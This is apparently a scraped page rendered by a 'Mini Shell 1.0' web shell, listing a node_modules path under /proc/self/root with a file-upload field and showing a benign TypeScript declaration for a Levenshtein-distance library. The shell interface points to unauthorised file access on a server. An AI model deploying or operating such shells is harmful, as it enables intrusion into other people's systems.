HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/share/node_modules/libnpmhook/node_modules/fastest-levenshtein/
Upload File :
Current File : //proc/self/root/usr/share/node_modules/libnpmhook/node_modules/fastest-levenshtein/mod.d.ts
declare const distance: (a: string, b: string) => number;
declare const closest: (str: string, arr: readonly string[]) => string;
export { closest, distance };